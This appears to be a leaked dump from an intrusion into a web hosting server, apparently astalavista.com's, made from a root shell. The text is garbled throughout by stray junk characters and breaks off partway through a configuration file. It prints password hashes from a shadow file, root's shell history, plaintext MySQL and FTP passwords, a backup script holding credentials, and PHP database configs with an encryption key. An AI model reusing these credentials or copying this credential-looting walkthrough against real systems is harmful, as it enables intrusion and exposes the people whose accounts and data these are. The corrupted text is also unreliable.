jon 1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
4 ?( k: [8 y$ b Kcom 1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::! u; r" ?/ v+ @, W
astanet 1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
1 L' f+ P7 s" \
5 ~% h: F( A) r4 d+ u2 [sh-3.2# cat /etc/motd
: u! B6 I, A3 G. O! N3 h#####################################################) j6 r$ S7 A9 o* e7 t* b
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #: G$ m' g& Y4 p" ?! `5 N/ t
# |__| [__ | |__| | |__| | | | [__ | |__| #& }6 ^! Q# Q' @) V0 R
# | | ___] | | | |___ | | \/ | ___] | | | #
+ b* \- F; d8 i* t" A# #
m' a: V& R& A, s#####################################################
' A A+ t1 ^4 \& D# #% E7 X8 ?- {; u
# Admin Contact - 链接标记support@secureservertech.com #
) `3 E+ G' z6 z$ u5 S$ v# #
; s, f' B: K5 U$ X5 w# a7 C# Available ShortCuts #
9 z0 a0 M. A/ u1 c# #. P' G( T1 Y. K: x; P; J2 Q5 Y" k
# nst - list active connections #
/ M) r; A! o$ A# ddos - shows how many times each ip is connected #
% @/ e: C; L9 @1 i# y X* E* P" {* O# ltr - restart the webserver #1 A/ h5 x n% H% v) k
# phpc - edit the php config file #
; Q( W& q# {; v8 _9 }# htc - edit the webserver configuration file #
4 G! J1 O- ]- y' ^# up - uptime #
/ \- S' `5 Y W, d; Z" \# etd - edit the motd of the day file #. H) C) A8 W4 j+ ]5 C7 e5 g1 |
# htr - start and restart apache if needed #
. g! |5 H W4 A( e! @$ V/ U# syng - shows active SYN_RECV connections #
5 ^, G+ T( {" \9 N) L# synd - syn flood blocker - “synd -h” for usage #
' F. G: }( f/ p$ M8 }3 j7 p#####################################################
+ h1 @/ Y0 E0 R9 }- s+ ] j# NOTES: #+ K, f5 L6 \6 t0 g( n% c* j
# Last Upgrade - 12-08-2008 by JF #
4 v# Z, i, B. s. w# My.cnf/Mysql Optimization - 1-28-09 #
: p; Q- B$ H: p/ j, d) V/ v# #! E) q( l- p& r4 g* ]( @8 W& Z
# #
2 j6 I2 w: u2 h2 q# #
6 O3 Y& ~% L! t% @7 |4 j6 \#####################################################
7 s( D; F3 p2 k$ G" V; t+ {& W" v ]4 ]" \; S/ F |; n
sh-3.2# lastlog | grep -v Never
& ]5 J6 f, I# P7 }' v; |Username Port From Latest
7 \# \# ^% e6 Jroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009' F9 Q9 P: E$ O" ^
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
( R9 a9 X! e1 `+ |2 @com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009 b+ p4 ]. S+ a& \% D+ `3 v
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20098 w! _* S4 U& \2 f1 {
1 ?$ A, x z E3 E0 Ush-3.2# ls -la
2 ^$ s$ Y- U$ E; T. U- C7 Rtotal 453376
" I1 P; z8 b- l6 w- n2 Ndrwxr-x— 15 root root 4096 Jun 4 08:40 .
5 p5 N6 v1 k$ {& S! H. Vdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..5 ?( ?% E& t5 Y/ {$ U( y
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip7 Z/ t0 \# T$ ~# D) b2 |( q
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
8 _. }' O4 B/ F( M9 b% ~-rw——- 1 root root 16836 Jun 4 07:21 .bash_history( m& _( \: f7 ]/ P# Z( }( y
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
1 ]0 ]! Y4 ^4 O! e0 I) F-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile0 F1 y( R% D u# Z- L
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
6 y& W/ n6 s1 [! B" F. |; m-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
* ]0 T/ G- [* g/ V* A-rw-r–r– 1 root root 1327 Nov 29 2007 cert
4 G8 L+ Z" `( |# d" ?* _-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql) y: d; S( X( t/ H
drwxr-xr-x 4 root root 4096 May 20 2008 .cpan. p/ W3 X. X$ n5 Y4 Y+ w
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
9 } }0 c# H: b0 y-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql1 v+ S! H4 {: A! ~# d* M
drwx—— 2 root root 4096 Oct 28 2007 .elinks- w4 v3 J) W% _# K3 j8 ~
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1( ?0 }9 o% \- n7 W
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
& h3 M, l. |6 X+ `-rw——- 1 root root 0 Apr 16 13:19 .history( _( _- _( U- L) L% ^
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
& m. _$ V& M+ P& {9 J h-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog5 D7 Q! E1 S3 ~& t' U. a& y- p
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh* f3 t* C0 @+ N+ S9 |! J: A
-rw——- 1 root root 35 Jun 2 14:23 .lesshst- B& v% I3 b. ~0 K
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
7 _7 }% R4 G9 w* B% U6 Ydrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
' E* ]1 q2 b B-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
1 i) t. Y Y2 i: g-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
0 |/ h3 W( l0 t# g-rwx—— 1 root root 760 Sep 18 2008 lp
% j$ z! t$ G' X: a) ]! Vdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.12 Q' j/ Y$ w3 R* ]
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz5 O D$ r! h& U& p8 M5 q4 o" I
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
; F8 G* X T' o8 G6 H! ?+ h7 S \drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
& D1 E5 Z- X, z+ u7 ]( \2 t: \-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz' G- f9 R' E3 c' h m8 T" S, M+ s
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
! M$ w# A# U7 T* z: {-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz4 D8 a$ }$ h0 Z' m
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
/ V" a5 k! Z/ N1 m$ m$ ^$ K-rw——- 1 root root 41 Oct 19 2007 .my.cnf
0 U7 u9 |' w2 s, f( s: V/ J-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
9 @) b8 `( F' Z: y/ {2 e4 X-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
. o. L1 o- U8 l# X8 i-rw——- 1 root root 41 May 20 2008 .mytop
) {; Z+ ~; d; N5 d/ ~+ }" zdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
+ C8 |4 K( R: F4 U' x, Y$ N& V% }-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz& o9 K! R* v9 ^* G# V, y8 x( [
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
4 e. ~8 s% |; G' N8 ]7 x9 ]-rw——- 1 root root 1462 Sep 21 2007 opt.php
0 \) \7 a+ s8 f0 ?, E# w1 Z( c-rw-r–r– 1 root root 3371 Sep 22 2007 p b0 W5 }* _' a) X& s ~
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
3 ~) |7 X1 Y! ]( c! i7 @3 k& K-rw——- 1 root root 1024 Feb 3 21:32 .rnd! t( v8 g4 m/ e4 d9 ^2 T+ l
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
* k& I' c" C, C, n. ?( @4 q8 m- O- O-rw-r–r– 1 root root 887 Nov 28 2007 server.key* ^# ~" Z' Q2 f1 N" D
drwx—— 2 root root 4096 Oct 10 2008 .ssh
$ I( _5 i/ _. {$ F* P+ d$ ~: l/ `2 e-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat J9 c1 E( B! j- Q) T0 T
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
0 l6 W9 y B1 R$ ~) b# |-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
4 m" J& T1 h) f5 q" [' c-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
& C, o' e `& M% p$ Q% w4 ]: f4 Ndrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
5 q5 J* e- C; Y8 L5 ]. ] f-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh1 d y, k. \$ f! B) {
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
) }) c. B# P; t. I. v1 T-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2; Y. U/ \: ~/ B
-rw——- 1 root root 12997 May 16 2008 .viminfo
, Z8 \5 b2 [- X8 Q: s$ [, Y/ }5 B
sh-3.2# cat .bash_history3 i9 Q6 D6 o& Z5 X
[snip]5 T/ A, J J0 r1 T# z- o# \) w
wget cp4sst.com/sstlinux.tar.gz
) ?1 ~2 N) J, z8 N2 \3 H7 d( g- btar zxvf sstlinux.tar.gz, q3 ~/ ]( {6 e. D- y* z% z, F# }
cd linux-2.6.27.10
, m. _. ], @" ssh install.sh
% @. N6 i# |# a% |- N8 ^ I$ {make bzImage ; make modules ; make modules_install ; make install. x B3 K J0 p$ a: Y5 g ?" E
make clean2 n1 e7 ]+ ?( W! c/ H9 \! M
service mysqld restart
' ~" T4 Q/ m! U @[snip]
7 }- x. r7 S3 V0 z" Y1 Z( Rcd /usr/sbin/
% M$ Q; D! K; G# Y; t3 p9 ]chmod 4777 traceroute' {2 Q' B5 V% `" ~& M: b$ X. a( h' W
chmod 4777 ping) W9 T. S! n2 _7 W" S, l
traceroute -I 链接标记[url]www.astalavista.ch[/url]7 X' f$ X7 D6 Y- l
[snip]7 N8 t# k8 Y! M5 k
vi /etc/csf/csf.conf
, p: B5 T/ K9 g) V0 ]traceroute google.ch# k$ s* Y6 P) O8 O9 W
service csf restart' i. ~/ [/ Z+ F/ |# B9 \8 g1 [5 F
tracert google.ch3 d6 P) J% q; t- Z0 v* n
service csf restart: w& g5 y$ t& P1 P
traceroute 链接标记[url]www.google.ch[/url]
0 b0 V- L! C/ R' q r1 ntracert 链接标记[url]www.google.ch[/url]( ^) _2 H2 ^/ K2 D j1 V5 o
traceroute 链接标记[url]www.google.ch[/url]( o. D+ L @+ C: E, V
locate traceroute
: I P# y" d" J) Gchown 4755 /bin/traceroute6 Y# c$ r" z1 j4 b/ M y) n9 Y s
chown 4777 /bin/traceroute
- e& W0 C. t$ B- |: _$ [locate ping3 t3 [% G. W$ h( O0 }. T
chown 4755 /bin/ping3 c) a3 ~1 _" T |/ F; ]/ K' J
chown 4777 /bin/ping" K4 y7 ^; v8 o8 O* z7 P
cd /bin/# S, ~4 {; f/ A) j4 d3 [' S
ls -ali | grep ping, |5 \3 O+ B' c5 E8 h
chown root ping
) Z: U/ T* B& R3 R4 R, Z0 S1 Vchmod 4755 ping% G3 Y# @) r* h
ls -ali | grep traceroute5 J4 u" M* ^5 I
chown root traceroute
T5 S- d8 A* P; P% G4 z, w) j1 D- A/ zchmod 4755 traceroute c* g; z8 T( a4 X. b- s
ls -ali | grep traceroute
/ n$ |5 V$ ^9 n. a E! w( \# ztraceroute -I 链接标记[url]www.google.ch[/url]
4 }4 _* S9 ?8 U |& btraceroute 链接标记[url]www.google.ch[/url]
2 M1 Z; D5 m; m" kwhois pmsantos.ch' @5 Y# ^2 S- ]) Z& f% m7 J+ N
[snip]0 |6 z# o/ t' ?4 a: l3 Y' R
mysql -h com_contrexx2_live < /root/defaultp_ports.sql6 H; ]" P) V# o6 Z. _
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
6 I6 {% Q' u' P* Q7 cmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
9 X$ u$ @1 v4 c0 ^+ Zmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql7 [3 t( _) b5 O5 `& j0 ^
top
; N7 \% c4 ~" B4 N2 h$ k& v8 e! Y) uping ssth.ch
4 @. R# ^2 F% T, ]0 }' cping asdlkfaljgasd???ljg???lasj.ch
: V: l" I0 w5 u& L' cping asdlkfaljgasdlasj.ch- T" @3 T' y7 y$ Z9 C% @; ]
ping 链接标记[url]www.ssth.ch[/url]# _0 ]" V# i9 _1 Z/ l5 J& D2 K+ @( P
ping ssth.ch' i* s. q% f+ Z S: q+ o0 `% ^' T1 O
nslookup 链接标记[url]www.google.ch[/url]' I% o+ ^# I* Z/ m9 P) X
nslookup 链接标记[url]www.ssth.ch[/url]% S2 O* f9 ~" q, b' H. F+ U% _
man nslookup; y8 ], T" O2 L; | {
ping 链接标记[url]www.google.ch[/url]& e0 o; s) S! G1 r+ O# O
nslookup 链接标记[url]www.google.ch[/url]/ x$ Q& }# w; L4 N! L
nslookup 链接标记[url]www.google.ch[/url]
2 Z* M* m) g: j" H9 q( F) i. C8 knslookup salfjasdlf.ch( ~/ k" O9 `$ K
[snip]- X( h. f1 J3 K) o
openssl passwd -1 sadf
8 F, _7 q6 M1 ~6 s. yopenssl passwd -1 5cZNHstdTy
# j- B \/ p [* l7 m- Z5 Hmysql
* A% ~; P0 I6 V& N/ l, m& t: xmysql
' n$ w$ \5 ^2 T- O0 Y" Zlocate proftp
+ N# H1 T6 @, ^9 ? o" o+ evi /etc/proftpd.passwd
0 I* Q. M: P) ]5 K; F4 dservice proftpd restart2 L2 V# D; @/ M
locate proftpd.conf, M! U8 e( M t
vi /etc/proftpd.conf5 K Y7 A* y* O% S: F; t7 h0 s
vi /etc/proftpd.passwd
, Q9 q$ e0 Z; a, p' ~8 cservice proftpd restart
3 x5 w% ?4 n5 Z8 ]' H[snip]
/ }, j0 x k6 p+ e/bin/sh /home/com/backup_system/backup.sh
: Y" h" ^4 m4 T" `4 Utar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
5 u) r' n( U+ |4 n+ E$ j( `& S5 |! Zmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql# D9 f/ M* R' A% h) a) l1 K
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
4 a* [( U6 Y0 _. b, x4 }% ~ls -ali" F5 c9 c$ s- f
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
[: d9 {5 F, ]- F3 R( E$ |mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql' y8 @" W( ]4 O9 F5 K
crontab -l
3 q5 o' p) L M( [% x1 U Icrontab -l
* V/ {: P( o) [php -q /home/com/public_html/modifications/cronjobs/securitynews.php5 [0 p6 T5 P( v! u( d: ^8 q2 n2 ?
/home/com/public_html/modifications/cronjobs/exploits.sh. A [. L3 Q" u: X
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
5 ]! A0 J; S8 k3 J0 {; Ktar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz) n% h- k# `# B, Z
cd lsws-4.0.3+ }$ j9 W) l/ t* I
sh install.sh
$ k3 n- R4 R2 \: h3 V3 Muptime
6 ]* h5 X" Y! p* xhdparm -tt /dev/sda
l! ?/ J- X) u: V! t6 q ^iostat) r# E4 \8 n0 G0 @6 _, q" V2 H
yum install iostat- H/ X6 x; E2 @4 U1 f* k% d
iostat; ~$ R7 E/ L- W6 Z- ], X: {
whereis iostat
. B1 A, _2 ^% Kyjm clean all
7 j& ^* R. e/ r4 y+ `2 ~2 F" Fyum clean all ; yum -y update
) S% A+ }& ], R' P! R- x8 B5 [; ]1 ziostat
6 W) S7 p O1 `/ g/ byum install systat
& j9 I* H6 e% x/ `4 M* q+ qrpm -qa | grep iostat
3 B8 {& R# D: Y3 k% Erpm -qa | grep sysstat
6 r# H7 H% b& g* Trpm -qa | grep systat1 r \# p( m1 c9 s# u
dmesg -c
9 M/ { E$ @- w9 s) o; D/ lsysctl -p
) {' _, R& ?6 o! S) iuname -r
, {2 f% S& t, t( ~% ncd /usr/src
3 t+ a' c- Z4 A$ b/ x( M7 Z! @; wwget nix101.com/kernels/sstlinux.tar.gz8 L m0 a; \$ ^; P1 M( c
shutdown -r now+ f* _* w+ d5 |9 `
nano -w /boot/grub/grub.conf" l3 A) r4 G; d# p0 x. W1 T
+ d. M5 ?) S8 P; q
sh-3.2# cat .my.cnf
0 t5 @8 ~) {- J- ? ?3 L[client]
6 Z s" L! b q; M% p4 f( j! |3 kuser=da_admin
; S1 z* i: ]2 ~8 ]% Q* K2 }7 }password=X9dctmRH
3 c7 a+ v: B+ Z+ ~5 W3 m2 r; O. W$ E8 u W u$ H
sh-3.2# cat /home/com/backup_system/backup.sh, k/ G2 A/ d: ^* D
#!/bin/sh
! k% ~+ U5 f- Q! q#####################################################################
8 X, ]+ d8 l. Y8 r( r1 Y' o( Q# #
+ a8 D) G# ] |% a: x$ S# incremental backup for astalavista.com #+ ]7 R+ _ o$ X- s
# #
# M. a( a" }+ D9 C# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
/ j# V$ r% z+ ]+ U, k( P" v. v! v# #& B# s R$ b. } E6 F* V
#####################################################################0 _# X3 a; z# h0 K; ~3 q
[snip]; g, O/ i' U. h' V
PROG_DIR=”/home/com/backup_system”;
/ c' g Q2 o. Q- g$ n/ _5 ~BACKUP_DIR=”/home/com/backups”;. \) A p, l5 Q- V4 T! t1 p/ R! \
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
: i, x8 |7 u7 b; N* u( A# ftp for synology backup server
! ^1 Y( y- o2 u% {$ M. }1 yFTP_HOST=”212.254.194.163″;- W* C3 U1 ]( l# x
FTP_PORT=”21″;
0 t: D; @; F- [" p0 N) z8 [* i4 cFTP_USER=”astalavista.com”;
/ F" Y5 v6 ~+ z3 V4 }0 n# ZFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
1 B+ z% A9 ~8 U3 p+ PFTP_DIR=”/astalavista.com”;
* k% |1 h5 O! @' z9 L; v# database
2 g7 F% N- L% h' N( F% H x$ m- LDB_HOST=”localhost”;
* b6 M H$ ?% N3 Q* l1 b$ J B& DDB_USER=”contrexxuser2″;. g6 o. k( V/ |% M O! X% X
DB_PASS=”0fEYNZgXz1pKe”;
' G Y+ ^- v3 U/ J1 ]3 z: [DB_DATABASE1=”com_contrexx2_live”;
3 W: _# _) O) F4 }: IDB_DATABASE2=”com_contrexx2″;2 ~0 {- n- m$ n: w
[snip]' e3 [' M, [: R0 e" i* X/ p
ftp -in $FTP_HOST $FTP_PORT <<EOF
* y! u5 D- W) H3 q* ` U Pquote USER $FTP_USER7 u" @6 g0 W) H4 }/ w
quote PASS $FTP_PASS5 k/ C, v7 j ?
cd $FTP_DIR& S+ ~" t" |* |" @* l' k/ H
put $DB_FULLNAME-SQL_Dump.tar& _7 D# ^2 g9 m/ u1 y* `
put $BACKUP_FULLNAME-Public_HTML.tar1 b+ j; A e$ c- l
close
& f2 V' q# R6 D) q Q2 O# ebye7 l* G- N& ]0 [! }$ ~/ s9 X
EOF* C* j( i4 L+ A: l& E% W
; ^; t1 ]% k! M& b" R9 A: ^
sh-3.2# cd /home0 {- t* o& R' g E$ D
sh-3.2# ls -la
- C% e- M% L% C& L; x* Y1 Ntotal 120. P+ G* ^) n' W2 B. t
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .! |1 o0 d1 k/ G2 c5 i' A- ?
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- t1 h; k$ k# T/ J9 g6 m& ^drwx–x–x 9 admin admin 4096 Nov 28 2007 admin, x' o' t" m5 l4 }, P& X
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
* X4 \( o B6 w p& u-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
: ^$ ?4 K. G2 l3 Hdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet+ T2 J2 b% M# L' W
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup) Z3 [& q: h4 q) z' w7 X) [
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161, {! u ~8 D- a
drwx–x–x 10 com com 4096 Apr 28 12:40 com3 B1 k: Y7 ^' b( q
drwxr-xr-x 2 root root 4096 May 17 2007 ftp, |0 b7 u2 |+ g5 \" X7 ^
drwx—— 3 jon jon 4096 Sep 21 2007 jon! ]; d0 w( l% l
drwx—— 2 root root 16384 Sep 11 2007 lost+found
- v! b5 F# L$ V% c3 K) c% a0 pdrwxr-xr-x 2 root root 4096 Sep 14 2007 my$ K/ }4 a# `9 q( D
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
: r, P$ ]& r. @/ Y* Adrwx—— 2 jon jon 4096 Sep 15 2007 test
8 D1 ~" C7 X; [8 E& I6 \9 {drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp: p& g; `$ o* Y4 K# S
, _/ X+ [# G- Y2 Qsh-3.2# cd admin) \1 C- Q; @- k, ^/ v# U
sh-3.2# ls -la
! r% U) F1 R" r L) Atotal 1735896
% r2 A- R2 a- q3 u* }; Qdrwx–x–x 9 admin admin 4096 Nov 28 2007 ./ c' g2 a6 _. O3 r9 `' r% k
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
\6 g5 h, M5 c# X Y" v' Q; `% adrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
& e) a. v. O0 F3 idrwx—— 2 admin admin 4096 Sep 28 2007 backups5 ~' j9 K, z8 v" [8 q
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history: C7 o' _/ d6 I7 R$ i
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout+ ~, X5 _$ d* T1 R" Y3 j
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile% `; ~$ l% u6 j, n2 |/ B! r
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc8 f: N* D2 |5 h4 w R0 K7 [
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups, y; W7 X' m6 Z6 i$ R8 o" O0 Z
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains; q& |7 r* f7 S5 L% j7 J
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap8 d/ D8 O( P0 @9 [0 v- P9 o" f/ b
-rw-r–r– 1 root root 24 Sep 21 2007 info.php3 j% H8 |5 P; X- r
drwx—— 2 admin admin 4096 Sep 21 2007 mail
0 v( F& L. k6 x! O) H# d2 V-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
% |/ Z, ]( Q' ?+ b& d-rw-r–r– 1 root root 887 Nov 28 2007 server.key
) Z' J( j9 E9 [/ D( F+ V' d-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow, e. O7 g I- [: }7 U# u
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz# E' ]8 D' D- Z; o
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups9 _ @) n: W R
' {. b$ g% J9 g3 l% }# e8 |sh-3.2# .., N. e, N- a5 l! a+ n
sh-3.2# cd jon
. L [! ]7 u; h/ e2 ysh-3.2# ls -la
* h% }/ y1 r( x7 R- y8 e% Ctotal 36* k4 s" E, n6 @+ U; |* e. J
drwx—— 3 jon jon 4096 Sep 21 2007 .7 I% t6 C& |: T+ u
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
0 N% a: P) X& c+ \- {5 L-rw——- 1 jon jon 53 Sep 21 2007 .bash_history& c; F& N* K, {: t
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout0 J! C9 w+ v9 ^6 Z7 `
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
+ U/ e: D' w7 E4 r* B7 V2 p-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
$ O. U: r1 w( E, L* r-rw-r–r– 1 root root 24 Sep 21 2007 info.php
, S% K2 ]$ e9 h/ }/ \drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
, h9 \5 Q7 F$ \) j- V- n- u% u5 r) e7 z j
sh-3.2# cd ..! s$ E6 c1 M1 t- Y5 r# Q- ^
sh-3.2# cd test
6 s, e( F7 E5 K5 `+ z! G4 _sh-3.2# ls -la0 G; I1 ^+ t$ k
total 48
1 B6 z4 S) ?# s6 Idrwx—— 2 jon jon 4096 Sep 15 2007 .
# I* x$ k9 u1 t$ X) Ydrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' V; o$ Y( G1 V* N4 \# \-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
5 r' X+ W6 A$ h& ^% ^) ]4 \-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout/ z# n, J5 U6 y9 P" N' e
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile# c' d1 V: [$ ?
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
% z- h! C4 ?1 dsh-3.2# cat .bash_history/ n+ [3 ^) G! F& t
/usr/bin/mysqladmin -u root password PoliuJhytg67
" t# W- j/ h' l7 x* Q8 v8 i. u
9 p; Q7 Q* Y0 bsh-3.2# cd .., B3 a5 C8 ^2 R& j5 a9 Y
sh-3.2# cd astanet3 N7 F) M" ~! N1 v k4 l
sh-3.2# ls -la
5 v* S+ l% k' ]total 52# f! ]: p+ Y4 L$ i5 g
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .6 B- L( _0 v1 m& b
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 S4 u! h8 W6 F' b5 m9 ]
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth G) F* w& u E' S9 Y6 Y
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
/ M' l" s& W- X8 E9 F% L' |-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
- `: P# R+ I; e' Q* t$ `" q-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
; ~1 G# m5 @. L5 m-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
+ `# c$ ~2 q# }6 f; s: d+ xdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains, Z) n9 o/ I1 L1 ^4 g2 q+ T
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap2 S! R1 e: G9 K0 c( M) E. ~
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail5 `" G, t* M1 `7 l3 m* `
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history/ R9 O! b4 t5 o2 E/ x# q
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
$ w) e% j% i4 u# c-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
( `, F* |( E7 V$ l+ L
* p: I0 M/ I3 O C/ msh-3.2# cd auth/% c" s$ Y% ~+ V4 [% O
sh-3.2# ls -la
3 m A. }- a; ~! `total 28
" Y$ h3 \1 h: E) {drwxr-xr-x 2 root root 4096 Dec 23 16:00 .
9 B; ]3 Q B s1 f5 s; n; e" Mdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..0 V9 w5 d8 O/ w f
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
4 Q/ o( }+ l( R3 [-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php9 J& B1 Z7 y7 g$ d1 G! X$ s: v
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd- r; i- L- u. {5 q6 f: g
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
9 \- U/ }8 Y7 X-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
" ]0 @# P: `5 h0 ^9 \
* a- l6 w' U1 I; {sh-3.2# cat hackercontest.config.inc.php2 d3 V5 r9 R2 O# O
<?PHP% l6 ]: T0 W: k- K/ W
// Variabeln f?r Verbindung zur Datenbank //6 u2 [3 d2 r* g7 B$ Q6 X- S
$conxHost = ‘localhost’; // MySQL hostname! n5 S( W$ g) N3 a$ F
$conxUser = ‘hackercontest’; // MySQL user9 g+ O/ N" p; Q- t
$conxPassword = ‘K6m@7dUc’; // MySQL password
* |$ B9 K7 C5 o' `$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish% J6 s' O, ~+ Y& l, N7 i# c
?>
; R9 [1 O6 c# P' f7 Psh-3.2# cat hosting.config.inc.php C3 U8 {2 X+ s
<?PHP
2 X( p% p- t% t' Y5 ?// Variabeln f?r Verbindung zur Datenbank //( `' G7 U# l" h9 D$ h1 J2 W
$conxHost = ‘localhost’; // MySQL hostname" b: \: r0 F7 G$ D7 r
$conxUser = ‘hostinguser’; // MySQL user
